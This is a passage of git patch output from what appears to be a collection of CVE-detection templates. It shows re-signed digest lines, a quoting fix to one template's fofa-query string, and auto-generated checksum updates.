http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-32682.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 2 +- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-46805.yaml | 2 +- http/cves/2023/CVE-2023-6895.yaml | 2 +- http/cves/2024/CVE-2024-21887.yaml | 2 +- http/cves/2024/CVE-2024-21893.yaml | 2 +- http/cves/2024/CVE-2024-22024.yaml | 2 +- 20 files changed, 20 insertions(+), 20 deletions(-) diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 732fbc9eb4..3cd87f31de 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099b0004c78261546ddee92f813ed07033007e7a8dd0ff0a86a8f24eedf199617022100a4d24a04b55d1f74aeb50551620875db7c38cba9f89652f3a5dbf50e545fae29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e232f0baa386a961ae8b970d4e146a2cc11ceb1732f26c2ef20295955e73a350022100baa328e6e710e562eb6cfa8e6f546f7d5da7d2d218cc08f888d389993d3211a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 18b2d6a8e9..4991b22251 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -50,4 +50,4 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# digest: 4a0a00473045022100bb761bd732caa4633175fb277ae6cb5413db1b1f38be0f5a60575eb0ac8fcc52022069ee62eab829a913c99b59cb9268d67426dd4012e8ebcaf33d69fe06bb0422de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c8212563123a44774116d7c5683e77960568efabe2186eddd3a932bec95f59f022100b8c1f6f528d1f59687696f621ec549e669b77b20f5a9c5fe740d557c6b53c652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index b9ad011458..6fdc4ec1a6 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -53,4 +53,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100d98c22603e30ee350d3b573d9d5ff4825287da33be904cc6363124775e5f14d2022100d0bdd8ca21310b6a688ca6b83bff7e0985fca4c661abd0703e2b8242d3bf6853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082c27b58a7f2461aff554dd5d689c6b64d365eb7a4307bb262df7556c0cfa5bd022100ccdcc3e07ad2d7fbb7a24bf16ad8d46efb371342f7048f1d74eba4b0db5eb126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index cc2e60bd10..093f38b1fd 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205122e29367165e876bee5c29e4bcbfe705ece5794ba39a0cf86f6e1cda275cbf0220086d44d6b78faed544fef3f8e6d555427fa40374b325d3de7fe815648bfd30f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e8f3ad83a505b658c3589c8e9f58b16079762f2fa09ff381e60d5674d647682022100a0333025e269f84fba3412ff25616db725b8c77ee8d7bfd724b84838bf009abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index e4516b072b..deee9aec79 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -66,4 +66,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "success")' condition: and -# digest: 4b0a00483046022100ade9023a98f1e582ced87da228df4387a9351ee1bc7d0f80b959b1c01efe9301022100a724a4b3f7b0d2716fa368d0014ba7c027ba80d657109e06ec9571050764a3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bbf59a47f71316406d2c275ffe083887a61ca90c2bb565a172cfafec81e8831d022100dd9addbecef7f4747f2d8f4e5e885ce12bf696e155604e3202698bc84fc89420:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 0489b4de45..6c3a1daa56 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024b1fa47aa40900fc6d2780d4b058e73c105e0afea27957c4b13eaa9d832e518022100b564558f8322ff1be933b2018a3a2ec91219e0e1399b633b02e3d65ea0349af4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026b9eff4faf7599079f837764767028f6e5520d8f44a5be3b3dda8d7685666760221008230a47ce5142560d40267697a5445d19124ff79ed4623f4fcd9c119b4591483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 19c5820323..0be734c0ee 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207e4f1ee2781a368be0c458eaaae8adb53e43b78fb18efe6e0ddbd4360db50c72022100bf77a98625b43e44488d9ed1d3bc33636a35c06b8c93ced20fe941ed6cf52a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db7f7118b80efca9c6b7a9e5122c0178b53df35cccac906cc2e4b7b6f6303030022032c0e4a5b50155baed736f13c51adad1904418dc84c461c59235f96e3efa9cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index ac86cf9c30..8eb0ec9383 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fd374bcfc7e0d1fb114e43721e82391d332bf970a505b476c6a4f46234d245002202cda416ffb5f16ec23002766e43acc4da7b06bf2294d3e7524a492b53d52fa15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a314ae51f73020c583762773eef6341d8df801ba4e0682eddf2da2a1f66b6a68022100f1898d30cc26e927ae9ebd0fda45824ae2c86fda77f438b8c2838cef00a7b8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 503b8f7ace..665b12ebb6 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202db04f9b255e97cf754ebc3deb27b4a54b33ce8bb5d8d77934815ccb21db9ca4022044559ab86eded575e036a3ddd5082711b30d9a6c7f8aa89fa03a1dc0ea16e380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d41f20bacb64537c7ebc1f93a45af8685a507b6da99f0a122c733d0656cfcb5d022100eccec5cfa1f9c7487c61db7db3b808555117ca0dea3a276f1b81ada31e9fe969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 8ee0a1a01f..30efd2cb82 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022034be4400ddd11bead7863e54de04f23d1c17f928aef2720f6a7c9b4d234581b2022001f7f119d81ac51ef899efc1106ad966682323a96b57947df36030ff8300e7d5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d231078095447bd320631039dee869d6cbb6aa41162ce4d20df62ebb5f1fcf600221009d1396e605fd7dc03ef58d5bc874856dd17cbcc41ed9047bf399b019c4c91c88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index bf89028ef1..0a37dac7d6 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ba5ebd65a068d08aa8a9fb4c512f59baa665b2cbe8fa4e25a66a92104f27f415022100d66fba2ed1e2304f9c437470604cb22840501aada5cd30a98bf5d9811b2b07e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220614ef078d691a5f14e80b47261e56ea1b93ef02cb8d3b9b3565c4e7114436bfb022076abe69243fb8935036a268de3bda1f2fa58c493fd3a35e8b2a62e9ec39db06f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index cbf14d6f72..b6f89d0eb7 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -55,4 +55,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100c58fceffebfff86b06bc748f4759ee099fb80f00e432c905c92ff3b6c436038302202c36e9465160abafb7e170e40b57a606e55425682a44759c74541c12bb7de277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205698995c249ffd4a99ec1e5e70748e5ff9b6672660456da63e2278057f774024022100cc2e426ca1958716eefc00654a4ef74b95883bc11134b574c4d717b24441305f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 53bdc464b9..f4c634ca3c 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -59,4 +59,4 @@ http: - status_code == 500 - contains(body, 'critical error') condition: and -# digest: 490a004630440220701c3e510171597b0328578de16d4891aa76d61b63459dc89839d25b3c9b65fc022003b91c82fa884ae8a5139739fddafa97aa75fcade9da5da3c7781d8ab95d07d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021b0065afd452b596019be1f29280c7188acefb68b151f4424790005959092ce0220570d61411787677f1f9159c72796d6bda6e7f3213de0c8314053f75bea9749bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 73b4aef3a0..26a48d8fe1 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5147f2bcdbc971c4379421b14ab15063e084d6306980cdb019ce3ed33fed2f1022100d73fa5942f5f3dd8d26a3c3438a85f0ddfbe1153c06e0136275336131a1788e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202de73ede6c782fa2e7558f120af51ccdb43e6a834f0cb11b796ac10f14abf745022068858456f26584ae6b4d402af1069998db1db3a842d77a00531bafc642d74867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index caf93a901a..72cedccfb6 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9067e909acc7a2d500f2c26948b4522fdc9edd4b54f73569d62173980ae5508022040a90e51a04e9bc63fdc75a8a8a3dafc7d45accc85ebcdde5cae853e953cdab2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eaebd01f85c85ab0ac1c84e6687bddb67703b7b394beddfc320b8a31e9c6cd8d022100d361cee4f4db9cd03330b2674ac1fdba912a93c4ea328fdca0d56ded1ca1dd72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 4fb876ef38..996e6d04f4 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "block_message")' - 'contains(header_2, "application/json")' condition: and -# digest: 490a0046304402200ecd050c196cc17a960bbe78b7217a1d0bbdf94d05261a528f992427117b470002206a36cafa1a82caa7f5dcaf43f9abaa55438c280dbdb67df57eaab83abc12ebc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d20c5dc0052826ea14f0dff2969048d96672f04b90e75cb43a55f82c0cdf9b9902203f2a6f982a2068da15545263b3a76ce341cbca2cd7c16dc3d0a16e8f9bd283bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index 757d797758..034e26941e 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009e5f6f58822279125780718555791f922c2ad0666d25b6f4968041dffbdaceca0220237fc1deabec0aa7764f6ff4be202849488aa19da84dcdcfb287fc8e8a7f7543:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5522ab583b393cf6a360b2e58dae29b4681cb2fefa1f6ad38518b6dc74c829c022013094391177663822a780dcd082911844f772129caea17c943068a4037e24e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 0c542dddb3..700c4f220d 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -50,4 +50,4 @@ http: - '"result":' - '"message":' condition: and -# digest: 4b0a00483046022100dfcc3f9560479437b285218b46fa79b25d6dce508f57d8d245a7722be24d64f20221009d4ce1c5c3203ebbe9527f74aaa75ad7a4d72d26f812ed7ac78a4fd9451829ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b11fb4caa72e93adcd3d6b4881baab60260caf734506dbeee298619d8a45db302205572b212a5aed50300f75693d3e4a74f34ee40ed420c6a4f2f83ded92f8699b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 381a5e5c93..0727b749b5 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -48,4 +48,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 490a0046304402200a0547b87f667aa36af039f186372735c368c54758d1da68f5b0fd18312a8c0402201944364cc59a7b39458b86b84369d97aa826d793c83d4c42fed8f694a87920be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a797d4c0fc87aff6583e71171c6d273e3f085bb60230c59a4a66e25d192d82d5022100a7a07c9ff12e69f386f9e2c80c1c134ea79bb8969038a584f32354d05de18618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 572a2940d4..2dd07ad283 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -46,4 +46,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4a0a00473045022100b30b610e83925ba39d984d8e235e97014a180a7e945b4a35faec7386faa1b79b022026685bd4cdedbb97d9918ebdd5f362731b82b6368331fc30b6dcbfef0acaccdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9957e443991b0960713b78c4fe96492cf6b6d9c5d70a45a77c8946752f125d1022100aba7f397b618737db6ab5865122dac0d1eab63346e36dc40656a995e97cbb619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3aa98d7f3b418f2f6f4db66847e7794a6113f2c0 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 24 May 2024 03:22:39 +0530 Subject: [PATCH 209/847] Update CVE-2024-1061.yaml --- http/cves/2024/CVE-2024-1061.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index aa0d05ef41..413103a138 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -30,7 +30,7 @@ info: vendor: bplugins product: html5_video_player framework: wordpress - fofa-query: "wordpress" && body="html5-video-player" + fofa-query: "\"wordpress\" && body=\"html5-video-player\"" tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player http: From dbf496de630cc80e137903b37c7383b9d2256ff3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:56:25 +0000 Subject: [PATCH 211/847] Auto Generated Templates Checksum [Thu May 23 21:56:25 UTC 2024] :robot: --- templates-checksum.txt | 44 +++++++++++++++++++++--------------------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 85abfd4a45..9189aa4173 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1372,7 +1372,7 @@ http/cves/2017/CVE-2017-9805.yaml:4fe5223d9747e0cd6872564b8069d1d2074a8fdc http/cves/2017/CVE-2017-9822.yaml:137875cd55de914baf6ad6cca7783b728484715c http/cves/2017/CVE-2017-9833.yaml:c08b62014c13f6adbdf1b39fb6199d35f4df773c http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a -http/cves/2018/CVE-2018-0127.yaml:0164997996d5bfeabd4811bb3b48e4d1429e4621 +http/cves/2018/CVE-2018-0127.yaml:b01f3b431d398441068d16cea655f42cd95a76dd http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c http/cves/2018/CVE-2018-1000129.yaml:03328d29e7ad3ec82f00b8de687d940ec9060db9 http/cves/2018/CVE-2018-1000130.yaml:c82881e9663b78ba5b44251f15b4e93555896100 @@ -1448,14 +1448,14 @@ http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb http/cves/2018/CVE-2018-16668.yaml:48491a4b2add544918c03545451fc5ee424330f3 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a -http/cves/2018/CVE-2018-16671.yaml:b476134832a83699c3f6f6a9cc62fc14afbb2bcf +http/cves/2018/CVE-2018-16671.yaml:906368ef356b2b4c8965f8046fd49dbef0dd821f http/cves/2018/CVE-2018-16716.yaml:a1f2d156568e8a37a17de9a2759623c13ba02f41 http/cves/2018/CVE-2018-16761.yaml:dbdf46a59546a320d395c2436fbca07cc9c1be86 http/cves/2018/CVE-2018-16763.yaml:804e34994429a56b36f2447a635c4bdc5dd59a07 http/cves/2018/CVE-2018-16836.yaml:98b608b7b785160c1ca398b8ccf5457933dafcbc http/cves/2018/CVE-2018-16979.yaml:94bde7048fe9f62210ccb11497dbc11e1c3b1c99 http/cves/2018/CVE-2018-17153.yaml:e004a49d22b96f5006592b6000346b3c51b7c321 -http/cves/2018/CVE-2018-17246.yaml:32adb5762d66a9817fc2a3a1de90400021bf65ab +http/cves/2018/CVE-2018-17246.yaml:22c110b22233af042e989536ce8b723547993e00 http/cves/2018/CVE-2018-17254.yaml:796bc823bb38f76e61b2c6a7b8d508a6a81a1cb8 http/cves/2018/CVE-2018-17422.yaml:90edc0d3636a6670e628eccc7eea61be4144918b http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 @@ -1717,7 +1717,7 @@ http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 http/cves/2020/CVE-2020-11530.yaml:e4de2a4e8e617c78ba87fa185790a0495bf0e8da http/cves/2020/CVE-2020-11546.yaml:0028a1adf59ba8524634f55e24652564fc5ce6b5 -http/cves/2020/CVE-2020-11547.yaml:51718edad043528ebbcde65242c7663b7812948c +http/cves/2020/CVE-2020-11547.yaml:494f8cc8b785fabe3ff98877a3174451aebc6daf http/cves/2020/CVE-2020-11710.yaml:c2bde61a09512b2cc4c86a2d7bdaa5e85172896e http/cves/2020/CVE-2020-11738.yaml:4c2e75351d44e91b76d713e865d22f88200e3567 http/cves/2020/CVE-2020-11798.yaml:d9e0f98c88d58160585123f986858af68e699b2e @@ -2076,7 +2076,7 @@ http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 http/cves/2021/CVE-2021-24827.yaml:61c481595a7dabb304fd1c0cec9c7cd6a6a39684 http/cves/2021/CVE-2021-24838.yaml:0cc51d4d1c10c2f4af870aa9b636013be8130a28 -http/cves/2021/CVE-2021-24849.yaml:0b8d4f84d5bdbcde91094c4d59650386d57abf37 +http/cves/2021/CVE-2021-24849.yaml:cf4dc11f4c272ed7159a418c8fec48d38bebc518 http/cves/2021/CVE-2021-24862.yaml:c12546a4335f7196f4b2813946601c2f74e79cca http/cves/2021/CVE-2021-24875.yaml:af4472bf9db8cc8423ae0c3b0ebe71c3767829bc http/cves/2021/CVE-2021-24891.yaml:d25791df32146893bfb3dc68d5b0175a4a53e2ee @@ -2117,7 +2117,7 @@ http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 http/cves/2021/CVE-2021-25114.yaml:10297fac562f4e9b4758c40509edd8eab28810f1 http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 http/cves/2021/CVE-2021-25120.yaml:180bff131d7b46afe0cbc57424767b9cad725a83 -http/cves/2021/CVE-2021-25281.yaml:aa1b740e4c902b0387a7a487f99a82e45cc72a4d +http/cves/2021/CVE-2021-25281.yaml:bde5a9f73b250b872edc034cbaa883533e6b672d http/cves/2021/CVE-2021-25296.yaml:eebdd9e01f7de42eac8b0acc73ef7737c22d6dc3 http/cves/2021/CVE-2021-25297.yaml:798c5dd2384ee37d90e12cc73b40dd17203a5e3a http/cves/2021/CVE-2021-25298.yaml:a1bd4f65462afa430f096448b5615192e924dc52 @@ -2182,7 +2182,7 @@ http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 http/cves/2021/CVE-2021-29625.yaml:89de3db861b7d733e2ba3aa140262d92187a64c5 -http/cves/2021/CVE-2021-3002.yaml:f80274efeea35bf2c073889b5ab76ce619691b69 +http/cves/2021/CVE-2021-3002.yaml:60618324e66630690c4b85faf6a5b38817601897 http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c http/cves/2021/CVE-2021-30134.yaml:7528c665e9c5128fe999de9ce7b20a371021ae74 @@ -2212,7 +2212,7 @@ http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 http/cves/2021/CVE-2021-3223.yaml:087280fa99bb84c2ea0ee9e446ede3320cfb4923 http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 http/cves/2021/CVE-2021-32618.yaml:1282d29e43f0a00e93a6fceebed1750a42af490f -http/cves/2021/CVE-2021-32682.yaml:51ca70b0cb3413265ae052b942999f9e3185bfd4 +http/cves/2021/CVE-2021-32682.yaml:31e0b4b5fdcf1ff4fb51b0f653ecfbce0ec0d9d2 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de http/cves/2021/CVE-2021-32819.yaml:380a8078feba8f1bc4e50b118a121f74d6cf25f8 http/cves/2021/CVE-2021-32820.yaml:c8e898d2d63b318200ed63044d0be7334a2e6f1b @@ -2312,7 +2312,7 @@ http/cves/2021/CVE-2021-40972.yaml:d27431d64ba53011509e840670cc2119f4dc6be9 http/cves/2021/CVE-2021-40973.yaml:e4beb729c195766e7d1b9460eb88a622e2780258 http/cves/2021/CVE-2021-40978.yaml:62ebc40431004d08ba54cf76229e706d2402c44a http/cves/2021/CVE-2021-41174.yaml:4c24cd07dea7803624fb8d4cfa46b618c024d961 -http/cves/2021/CVE-2021-41192.yaml:429f7fe2a345a9b2aafffe5d8876b9461813840d +http/cves/2021/CVE-2021-41192.yaml:601ba7b0718721723f1f23a60b055c0f03c7c755 http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 http/cves/2021/CVE-2021-41277.yaml:8fda77b1487c28d680cc2eae21e04c291c2a660d http/cves/2021/CVE-2021-41282.yaml:40c118c32ea07c6cbfab601a6e9c7999dd44ac79 @@ -2467,7 +2467,7 @@ http/cves/2022/CVE-2022-0824.yaml:834df363f2d408a096b0e7c39a96f875659e99df http/cves/2022/CVE-2022-0826.yaml:c968716c056d8bac29c828f6de28d91fe05c9131 http/cves/2022/CVE-2022-0827.yaml:08336164d26872a6cc676046ef7a1e26af4d1d30 http/cves/2022/CVE-2022-0846.yaml:f79dd734e1a26b052d0e36f9492518e49c90678c -http/cves/2022/CVE-2022-0864.yaml:1a6baf788487f6ebf716823b6c3191ef8da02348 +http/cves/2022/CVE-2022-0864.yaml:5c7707d5caef3af0c8a26df70fa01c5bb9eace7e http/cves/2022/CVE-2022-0867.yaml:6e863875d948eb2710e1bd9f80b30a8a4a84e1ce http/cves/2022/CVE-2022-0869.yaml:eac3f6cb08a6fde39633b57380547f077d31f125 http/cves/2022/CVE-2022-0870.yaml:50d1fffb2a551f946af8743ee205f95504659338 @@ -2560,7 +2560,7 @@ http/cves/2022/CVE-2022-23881.yaml:af0d94cea1d7840f3800ea02e4e602cf960d2530 http/cves/2022/CVE-2022-23898.yaml:f8c8e4e7f9865bcec5cf8dac00c5c7bab1866bf2 http/cves/2022/CVE-2022-23944.yaml:320d92bd111caf4003aeac9a1ef9f65cee4f1f5d http/cves/2022/CVE-2022-24112.yaml:4034ea358c38ea2642cfbafd6bc5f9949c0e9a74 -http/cves/2022/CVE-2022-24124.yaml:8892e5824c33368ec1d301ce8911f00e3da4b28d +http/cves/2022/CVE-2022-24124.yaml:85c1904f8c2d576f24afbcbbaaa093f994074cb8 http/cves/2022/CVE-2022-24129.yaml:e9b5d1244a8f2dea948ea4cfb46b3756f0292aea http/cves/2022/CVE-2022-2414.yaml:68d31eaf41572c264f08d1f4bc5041cdb6543a36 http/cves/2022/CVE-2022-24181.yaml:776437592260aa5a0b327bd750557745bb2fa704 @@ -2967,7 +2967,7 @@ http/cves/2023/CVE-2023-26067.yaml:a9b18f2101c4ada25295447e64d845c7fb5c4266 http/cves/2023/CVE-2023-26255.yaml:72ba0cb106a848cbf4550abb5e379601fc8d57c7 http/cves/2023/CVE-2023-26256.yaml:235515a1f0e49888d8e059097494109563de4d3f http/cves/2023/CVE-2023-26347.yaml:e2a80f4ae72176cbd3d0b523754f551888e7bbda -http/cves/2023/CVE-2023-26360.yaml:20a2d969c967e6eff664ae11ef103045267d14f2 +http/cves/2023/CVE-2023-26360.yaml:8985b3d841f6b32d33228f02fb4a29cfd1c2f647 http/cves/2023/CVE-2023-26469.yaml:fef5e0a0a6c5d3fb658813db3402193eb13a9711 http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34 @@ -2997,7 +2997,7 @@ http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e http/cves/2023/CVE-2023-2825.yaml:e52fcd86c715c973f0d368fec0a8bbe61a0aa3ac http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1 